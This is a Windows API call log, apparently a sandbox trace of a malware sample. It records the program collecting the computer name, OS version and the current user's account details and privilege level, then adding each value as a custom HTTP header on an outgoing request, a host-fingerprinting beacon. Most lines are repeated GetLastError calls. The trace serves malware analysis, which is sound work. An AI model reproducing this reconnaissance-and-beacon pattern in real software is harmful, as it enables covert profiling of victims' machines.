	[0095.997] RegQueryValueExW (in: hKey=0x294, lpValueName="ProxyOverride", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x258f2d4*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x258f2d4*=0x0) returned 0x2
	[0095.997] RegQueryValueExW (in: hKey=0x294, lpValueName="AutoConfigURL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x258f2d4*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x258f2d4*=0x0) returned 0x2
	[0095.997] RegCloseKey (hKey=0x294) returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.997] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.998] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0095.999] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.000] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.001] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetLastError () returned 0x0
	[0096.002] GetComputerNameW (in: lpBuffer=0x259e558, nSize=0x258f438 | out: lpBuffer="X2VS1CUM", nSize=0x258f438) returned 1
	[0096.002] GetLastError () returned 0xcb
	[0096.002] GetLastError () returned 0xcb
	[0096.002] GetLastError () returned 0xcb
	[0096.002] GetLastError () returned 0xcb
	[0096.002] GetLastError () returned 0xcb
	[0096.002] GetLastError () returned 0xcb
	[0096.002] GetLastError () returned 0xcb
	[0096.002] GetLastError () returned 0xcb
	[0096.002] GetLastError () returned 0xcb
	[0096.002] GetLastError () returned 0xcb
	[0096.002] GetLastError () returned 0xcb
	[0096.002] GetLastError () returned 0xcb
	[0096.002] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.003] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] GetLastError () returned 0xcb
	[0096.004] wsprintfW (in: param_1=0x259e140, param_2="X-ComputerName: %s" | out: param_1="X-ComputerName: X2VS1CUM") returned 24
	[0096.004] lstrlenW (lpString="X-ComputerName: X2VS1CUM") returned 24
	[0096.004] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-ComputerName: X2VS1CUM", dwHeadersLength=0x18, dwModifiers=0x10000000) returned 1
	[0096.004] GetVersionExW (in: lpVersionInformation=0x258f31c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x258f31c*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x2, dwBuildNumber=0x23f0, dwPlatformId=0x2, szCSDVersion="")) returned 1
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.004] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.005] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.006] GetLastError () returned 0x0
	[0096.010] GetLastError () returned 0x0
	[0096.010] GetLastError () returned 0x0
	[0096.010] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] wsprintfW (in: param_1=0x259e140, param_2="X-OSVersion: %d.%d.%d|%s %d.%d|%d|0x%p" | out: param_1="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0096.011] lstrlenW (lpString="X-OSVersion: 6.2.9200| 0.0|1|0x00000100") returned 39
	[0096.011] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-OSVersion: 6.2.9200| 0.0|1|0x00000100", dwHeadersLength=0x27, dwModifiers=0x10000000) returned 1
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.011] GetLastError () returned 0x0
	[0096.012] wsprintfW (in: param_1=0x259e140, param_2="X-VendorId: %d" | out: param_1="X-VendorId: 3007") returned 16
	[0096.012] lstrlenW (lpString="X-VendorId: 3007") returned 16
	[0096.012] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-VendorId: 3007", dwHeadersLength=0x10, dwModifiers=0x10000000) returned 1
	[0096.012] GetCurrentProcess () returned 0xffffffff
	[0096.012] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x258f2fc | out: TokenHandle=0x258f2fc*=0x294) returned 1
	[0096.012] GetTokenInformation (in: TokenHandle=0x294, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x258f2d8 | out: TokenInformation=0x0, ReturnLength=0x258f2d8) returned 0
	[0096.012] GetLastError () returned 0x7a
	[0096.012] GetTokenInformation (in: TokenHandle=0x294, TokenInformationClass=0x1, TokenInformation=0x2593c48, TokenInformationLength=0x24, ReturnLength=0x258f2d8 | out: TokenInformation=0x2593c48, ReturnLength=0x258f2d8) returned 1
	[0096.012] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x2593c50*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2e)), Name=0x259e558, cchName=0x258f2cc, ReferencedDomainName=0x259e760, cchReferencedDomainName=0x258f2cc, peUse=0x258f2c0 | out: Name="Nd9E1FYi", cchName=0x258f2cc, ReferencedDomainName="X2VS1CUM", cchReferencedDomainName=0x258f2cc, peUse=0x258f2c0) returned 1
	[0096.014] CloseHandle (hObject=0x294) returned 1
	[0096.014] CloseHandle (hObject=0xffffffff) returned 1
	[0096.014] NetUserGetInfo (in: servername="X2VS1CUM", username="Nd9E1FYi", level=0x3, bufptr=0x258f2fc | out: bufptr=0x25a0118*(usri3_name="Nd9E1FYi", usri3_password=0x0, usri3_password_age=0x1867712, usri3_priv=0x2, usri3_home_dir="", usri3_comment="", usri3_flags=0x10201, usri3_script_path="", usri3_auth_flags=0x0, usri3_full_name="", usri3_usr_comment="", usri3_parms="", usri3_workstations="", usri3_last_logon=0x5bbf6dd7, usri3_last_logoff=0x0, usri3_acct_expires=0xffffffff, usri3_max_storage=0xffffffff, usri3_units_per_week=0xa8, usri3_logon_hours=0x25a01af, usri3_bad_pw_count=0x0, usri3_num_logons=0x34, usri3_logon_server="\\\\*", usri3_country_code=0x1, usri3_code_page=0x4e4, usri3_user_id=0x3e8, usri3_primary_group_id=0x201, usri3_profile="", usri3_home_dir_drive="", usri3_password_expired=0x0)) returned 0x0
	[0096.066] wsprintfW (in: param_1=0x259e140, param_2="X-User-Info: %ws|%ws|0x%p|0x%p|%ws|%ws" | out: param_1="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0096.066] lstrlenW (lpString="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*") returned 62
	[0096.066] HttpAddRequestHeadersW (hRequest=0xcc000c, lpszHeaders="X-User-Info: Nd9E1FYi|X2VS1CUM|0x00000000|0x00010201|admin|\\\\*", dwHeadersLength=0x3e, dwModifiers=0x10000000) returned 1
	[0096.066] NetApiBufferFree (Buffer=0x25a0118) returned 0x0
	[0096.066] GetLastError () returned 0x0
	[0096.066] GetLastError () returned 0x0
	[0096.066] GetLastError () returned 0x0
	[0096.066] GetLastError () returned 0x0
	[0096.066] GetLastError () returned 0x0
	[0096.066] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.067] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
	[0096.068] GetLastError () returned 0x0
